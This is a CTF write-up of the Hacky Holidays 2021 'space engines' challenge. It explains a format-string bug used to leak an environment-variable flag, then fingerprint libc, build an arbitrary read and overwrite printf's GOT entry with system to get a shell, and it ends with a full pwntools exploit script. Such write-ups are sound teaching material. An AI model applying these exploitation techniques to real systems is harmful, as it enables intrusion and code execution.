#pwn #format-string Part of the [[Hacky Holidays 2021]] CTF. # Description These space engines are super powerful. Note: the .py file is merely used as a wrapper around the binary. We did not put any vulnerabilities in the wrapper (at least not on purpose). The binary is intentionally not provided, but here are some properties: ```plain Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) ``` Files: [engine.py](https://mega.nz/file/G09QyK4R#F6f6Z5osdIr7hhEwhYoUfa0oQmCblfOFvnSUtFsZ7vA) [engine.c](https://mega.nz/file/jt8kgI7C#shyWgiGxeEBUWsYfMmj8mloeunWsHv2PZ5ucFNPAGjM) # Part 1 ## Description These new space engines don't have any regard for their environment. Hopefully you can find something useful. ## Static Analysis Let's start by looking at `wrapper.py`. It uses `pwntools` to wrap the `engine` binary's input and output. The most important line is: ```python if any(c not in string.ascii_letters + string.digits + string.punctuation for c in inp): ``` This means that we can only use ASCII characters (minus whitespace) in our input to the program. Now let's review `wrapper.c`. The vulnerability here is pretty obvious: the user-controlled string `i` is passed as the first argument of `printf` which leaves the program open to a format string exploit. ## Exploitation The description of this part seems to hint at environment variables. Luckily for us these are stored on the stack making them easy to read using the format string vulnerability. A `
in a format string allows you to specify the argument number. System V calling conventions mean that the first six arguments are stored in registers but after that they are taken from the stack. This allows us to incrementally read the entire stack by incrementing the argument number. We'll start by writing a function to get the value at a particular argument number using `pwntools`: ```python def get(offset): io.sendlineafter("Command: ", f"%{offset}$016llx") io.recvuntil("(") try: return int(io.recv(16), 16) except: return 0 ``` Now we can write a short snippet using to increment the argument number and output the results as binary strings: ```python for i in count(): print(p64(get(i))) ``` Near the bottom of the output we find: ```plain b'user\x00FLA' b'G=CTF{5d' b'f83ee123' b'b2541708' b'd3913df8' b'ee4081}\x00' ``` Which means the first flag is `CTF{5df83ee123b2541708d3913df8ee4081}`. # Part 2 ## Description Can you take control of the engine? ## Plan The description of this part makes it clear that we need to get a shell. As the executable only has partial RELRO we can achieve this by overwriting a GOT (Global Offset Table) entry. We could, for example, overwrite `printf`s entry with the address of `system`. Whilst the GOT entry's address will be constant as PIE is disabled, we are not given the binary so it will take a bit of digging to find out its location. We also aren't given the `libc` build so we will have to work that out to find the address of `system`. On top of this we are limited on the bytes we can use which will make the write operation difficult. ## Build Identification Let's start by identifying the `libc` build. Normally this would be quite easy as format string exploitation gives an arbitrary read primitive but the input limitation means that we are very limited about what addresses we can write to the stack (and thus read from). Because of this limitation we will have to make the best of the addresses that are already on the stack. We can start by writing a function to print a nice representation of the stack: ```python def print_stack(): for i in count(): address = get(i) print(i, hex(address)) ``` We can infer quite a lot from the output: - There are a lot of addresses starting in `0x7ff` in a row. These are probably arrays meaning that the addresses are most likely stack addresses. - There are a number of other addresses starting in `0x7f`. These are most likely `libc` addresses as they span quite a large range. Now we can write another function to leak the data stored at one of these addresses: ```python def leak(offset): io.sendlineafter("Command: ", f"%{offset}$s") io.recvuntil("(") return io.recvuntil(")", drop=True) ``` And modify our `print_stack` function to include leak `libc` addresses: ```python def print_stack(): for i in count(): address = get(i) if 0x7f0000000000 <= address < 0x7ff000000000: print(i, hex(address), leak(i)) else: print(i, hex(address)) ``` We get the following relevant output lines: ```plain 5 0x7f330451f2d0 b'\x8bV\xfc\x89W\xfc\xc3f\x0f\x1f\x84' 35 0x7f33043d2bf7 b'\x89\xc7\xe8B\x16\x02' 51 0x7f33047b28d3 b'I\x83\xc6\x08L;4$u\xeb\x83\xeb\x01\x83\xfb\xff\x0f\x85C\xff\xff\xffH\x83\xc4\x18[]A\\A]A^A_\xc3\x0f\x1f\x84' 52 0x7f3304798638 b'P\xadT\x043\x7f' 99 0x7f33047a2000 b'\x7fELF\x02\x01\x01' ``` Interestingly there is an ELF header at `0x7f33047a2000` which probably belongs to the loader. We can use these the tooling provided by the [`libc` database project](https://github.com/niklasb/libc-database) to download a huge number of possible `libc` builds. Following that we can write a script to only show the builds that contain the byte strings we leaked: ```python from pathlib import Path STRING_1 = b'\x8bV\xfc\x89W\xfc\xc3f\x0f\x1f\x84' STRING_2 = b'\x89\xc7\xe8B\x16\x02' for path in Path("libc-database/db").iterdir(): if path.name.endswith("so"): with path.open("rb") as f: contents = f.read() if STRING_1 in contents and STRING_2 in contents: print(path) ``` We've only included a couple of the strings since the rest were close to or after the loader header meaning they may not have been part of `libc`. Running the program gives the following output: ```plain libc-database/db/libc6_2.27-3ubuntu1.3_amd64.so libc-database/db/libc6_2.27-3ubuntu1.4_amd64.so ``` As there are only two possibilities we can try one and change it for the other if the exploit fails. ## Arbitrary Read The limitations imposed by the wrapper mean that we will have to be creative to obtain an arbitrary read and find the GOT entry. Again we will make use of the addresses already on the stack. If we can find an address on the stack that points to the stack then we can use the format string exploit to write an arbitrary address to the stack. Following this we can use the format string exploit again to read the contents of the written address. Any of the addresses starting in `0x7ff` are possible candidates so let's write a script to do a test write and then print the stack: ```python offset_to_test = 1 io.sendlineafter("Command: ", f"%{0x1111}c%{offset_to_test}$lln") print_stack() ``` A few of the offsets work. We will use offset 60 which writes to offset 61: ```plain 60 0x7fff5909e4b8 61 0x1111 ``` Now we can write a function to read from any address: ```python def read(address): io.sendlineafter("Command: ", f"%{address}c%60$lln") io.sendlineafter("Command: ", f"%61$s") io.recvuntil("(") return io.recvuntil(")", drop=True) ``` Let's test it with `print(read(0x400000))` to get the start of the binary. As expected we receive an ELF header (`b'\x7fELF\x02\x01\x01'`). Whilst in theory we should be able to read from any address, in practice this would involve receiving trillions of bytes for a high address. Luckily however the GOT is part of the `engie` binary and so resides at a fairly low address. ## GOT Entry To get the approximate location of the GOT entry we can compile `engine.c` on the same operating system as the target. Searching the `libc` builds we identified shows that the OS is Ubuntu 18.04. After installing an Ubuntu 18.04 VM and compiling `engine.c` with `-no-pie` we can use `gdb`s `maintenance info sections` to see that `.got.plt` is at `0x00601000` so that is where we should start our search: ```python for i in count(0x00601000, 8): print(hex(i), hex(u64(read(i).ljust(8, b"\x00")))) ``` We get the following output: ```plain 0x601000 0x7fedc42e7aa0 0x601008 0x4005b6 0x601010 0x7fedc42ef5a0 0x601018 0x7fedc42cbf70 0x601020 0x7fedc43f0fb0 0x601028 0x7fedc4288b10 ``` ASLR won't affect the lower 12 bits of addresses since the page size is `0x1000`. This means we can took at the lower three nibbles to identify which address is that of `printf`. Both `libc` builds have `printf` at `0x64f70` so `0x601018` is the address of the relevant GOT entry. ## Shell It's finally time to tie everything together and get a shell. We will start by loading the identified `libc` build and using one of the previously discovered binary strings to defeat ASLR: ```python libc = ELF("libc-database/db/libc6_2.27-3ubuntu1.4_amd64.so") libc.address = get(35) - next(libc.search(b"\x89\xc7\xe8B\x16\x02")) ``` Now we can use the format string exploit to write the GOT entry address to the stack: ```python io.sendlineafter("Command: ", f"%{0x601018}c%60$lln") ``` Following this we just need to use the format string exploit again to overwrite `printf`'s GOT entry with the address of `system`. In order to avoid printing trillions of characters we can just overwrite the lower 4 bytes: ```python io.sendlineafter("Command: ", f"%{libc.sym.system & 0xffffffff}c%61$n") ``` All we need to do now is wait for all the characters to be sent and make the IO interactive: ```python io.recvuntil(")") io.interactive() ``` A few minutes after starting the script we are given control. Entering `ls` shows that the file `you_are_an_amazing_hacker.txt` exists and confirms that we have a shell. Since we still can't use whitespace we can enter `cat<you_are_an_amazing_hacker.txt` to retrieve the flag (`CTF{4ffac46e926dcadeba7d365ff2b2a9af}`). # Full Script ```python from itertools import count from pwn import * io = remote(...) def get(offset): io.sendlineafter("Command: ", f"%{offset}$016llx") io.recvuntil("(") try: return int(io.recv(16), 16) except: return 0 def leak(offset): io.sendlineafter("Command: ", f"%{offset}$s") io.recvuntil("(") return io.recvuntil(")", drop=True) def print_stack(): for i in count(): address = get(i) if 0x7f0000000000 <= address < 0x7ff000000000: print(i, hex(address), leak(i)) else: print(i, hex(address)) def read(address): io.sendlineafter("Command: ", f"%{address}c%60$lln") io.sendlineafter("Command: ", f"%61$s") io.recvuntil("(") return io.recvuntil(")", drop=True) # for i in count(): # print(p64(get(i))) # print_stack() # offset_to_test = 60 # io.sendlineafter("Command: ", f"%{0x1111}c%{offset_to_test}$lln") # print_stack() # print(read(0x400000)) # for i in count(0x00601000, 8): # print(hex(i), hex(u64(read(i).ljust(8, b"\x00")))) libc = ELF("libc-database/db/libc6_2.27-3ubuntu1.4_amd64.so") libc.address = get(35) - next(libc.search(b"\x89\xc7\xe8B\x16\x02")) io.sendlineafter("Command: ", f"%{0x601018}c%60$lln") io.sendlineafter("Command: ", f"%{libc.sym.system & 0xffffffff}c%61$n") io.recvuntil(")") io.interactive() ```